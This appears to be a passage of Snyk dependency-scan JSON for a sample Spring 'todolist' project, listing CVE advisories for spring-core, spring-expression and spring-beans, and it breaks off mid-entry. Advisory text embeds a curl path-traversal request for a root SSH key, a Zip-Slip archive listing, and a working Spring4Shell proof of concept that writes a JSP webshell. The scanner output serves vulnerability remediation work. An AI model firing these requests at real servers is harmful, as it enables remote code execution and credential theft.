"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:34.544783Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:10.667113Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Input Validation when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.2.19.RELEASE, 5.3.14 or higher.\n## References\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22060)\n", + "epssDetails": { + "percentile": "0.23203", + "probability": "0.00054", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-22060" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2022-01-06T12:31:26.181234Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-01-06T11:18:34Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2022-01-06T17:17:24.995166Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:10.667113Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", + "title": "Directory Traversal", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.9.RELEASE", + "4.0.5.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ], + "functionId": { + "filePath": "org/springframework/util/StringUtils.java", + "className": "StringUtils", + "functionName": "cleanPath" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/16414", + "title": "GitHub Issue" + }, + { + "url": "https://jira.spring.io/browse/SPR-12354", + "title": "Jira Issue" + }, + { + "url": "http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html", + "title": "JVNDB" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578", + "title": "NVD" + }, + { + "url": "https://pivotal.io/security/cve-2014-3578", + "title": "Pivotal Security" + }, + { + "url": "http://www.pivotal.io/security/cve-2014-3578", + "title": "Pivotal Security" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1131882", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:07.314890Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:25.325641Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:07.314890Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Directory Traversal. It allows remote attackers to read arbitrary files via a crafted URL.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `org.springframework:spring-core` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16414)\n- [Jira Issue](https://jira.spring.io/browse/SPR-12354)\n- [JVNDB](http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578)\n- [Pivotal Security](https://pivotal.io/security/cve-2014-3578)\n- [Pivotal Security](http://www.pivotal.io/security/cve-2014-3578)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1131882)\n", + "epssDetails": { + "percentile": "0.69801", + "probability": "0.00301", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-3578" + ], + "CWE": [ + "CWE-22" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:31.465000Z", + "functions_new": [ + { + "version": [ + "[3.0.0.RELEASE, 3.2.9.RELEASE)", + "[4.0.0.RELEASE, 4.0.5.RELEASE)" + ], + "functionId": { + "className": "org.springframework.util.StringUtils", + "functionName": "cleanPath" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2014-09-05T17:16:58Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2014-09-05T17:16:58Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:07.314890Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "4ra1n" + ], + "semver": { + "vulnerable": [ + "[,5.2.20.RELEASE)", + "[5.3.0,5.3.17)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.20.RELEASE", + "5.3.17" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using Spring Expression Language (SpEL)" + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/28145", + "title": "GitHub Issue" + }, + { + "url": "https://pivotal.io/security/cve-2022-22950", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:48:12.598178Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:47.044801Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:01.573408Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:12.598178Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.044801Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) by providing a specially crafted SpEL expression, that might result in an `OutOfMemoryError`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.20.RELEASE, 5.3.17 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28145)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2022-22950)\n", + "epssDetails": { + "percentile": "0.35300", + "probability": "0.00081", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22950" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2022-03-29T10:05:31.971026Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-03-29T09:51:43Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2022-03-29T14:24:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.044801Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Google OSS-Fuzz team" + ], + "semver": { + "vulnerable": [ + "[,5.2.23.RELEASE)", + "[5.3.0,5.3.26)", + "[6.0.0,6.0.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.23.RELEASE", + "5.3.26", + "6.0.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2023-20861", + "title": "Vulnerability Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:04.052825Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:54:00.291695Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:22.626014Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:04.052825Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.291695Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20861)\n", + "epssDetails": { + "percentile": "0.48906", + "probability": "0.00133", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-20861" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2023-03-23T12:26:39.837900Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-03-23T11:49:46Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2023-03-23T12:37:13.052190Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.291695Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Google OSS-Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,5.2.24.RELEASE)", + "[5.3.0,5.3.27)", + "[6.0.0,6.0.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.24.RELEASE", + "5.3.27", + "6.0.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2023-20863", + "title": "Vulnerability Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:09.820460Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:15.433654Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:09.820460Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20863)\n", + "epssDetails": { + "percentile": "0.70100", + "probability": "0.00306", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-20863" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2023-04-14T06:33:20.884492Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-04-14T06:25:45Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2023-04-14T06:33:21.063044Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:09.820460Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", + "title": "Remote Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ] + }, + "exploit": "High", + "fixedIn": [ + "5.2.20", + "5.3.18" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ], + "functionId": { + "filePath": "org/springframework/beans/CachedIntrospectionResults.java", + "className": "CachedIntrospectionResults", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-beans", + "references": [ + { + "url": "https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html", + "title": "CyberKendra Post" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15", + "title": "GitHub Commit" + }, + { + "url": "https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/", + "title": "LunaSec Blog" + }, + { + "url": "https://blog.payara.fish/payara-and-spring4shell", + "title": "Payara Blogpost" + }, + { + "url": "https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara", + "title": "Payara PoC" + }, + { + "url": "https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/", + "title": "Snyk Blog - Technical Breakdown" + }, + { + "url": "https://github.com/Kirill89/CVE-2022-22965-PoC", + "title": "Snyk PoC" + }, + { + "url": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement", + "title": "Spring Security Announcement" + }, + { + "url": "https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative", + "title": "Spring Tomcat Mitigation Advice" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:12.628867Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:15.463472Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-30T15:25:03.231650Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:12.628867Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:15.463472Z" + } + ], + "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Remote Code Execution via manipulation of `ClassLoader` that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).\r\n\r\n**Note:** \r\n* Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara, or Glassfish. \r\n\r\n* However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well. \r\n\r\n* As such, while we recommend users prioritize first remediating against the configuration described above, for full protection, we also recommend upgrading all vulnerable versions to the fixed `spring-beans` version regardless of the application configuration.\r\n\r\n### Update Log \r\n* **31/03/2022 -** Severity was raised from 8.1 to 9.8\r\n* **08/04/2022 -** Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish). \r\n\r\n\r\n## PoC\r\n```java\r\n1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0\r\n2/ ./mvnw install\r\n3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps\r\n4/ curl -X POST \\\r\n -H \"pre:<%\" \\\r\n -H \"post:;%>\" \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \\\r\n http://localhost:8888/handling-form-submission-complete/greeting\r\n5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp\r\n```\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.20, 5.3.18 or higher.\n## References\n- [CyberKendra Post](https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15)\n- [LunaSec Blog](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)\n- [Payara Blogpost](https://blog.payara.fish/payara-and-spring4shell)\n- [Payara PoC](https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara)\n- [Snyk Blog - Technical Breakdown](https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/)\n- [Snyk PoC](https://github.com/Kirill89/CVE-2022-22965-PoC)\n- [Spring Security Announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)\n- [Spring Tomcat Mitigation Advice](https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei 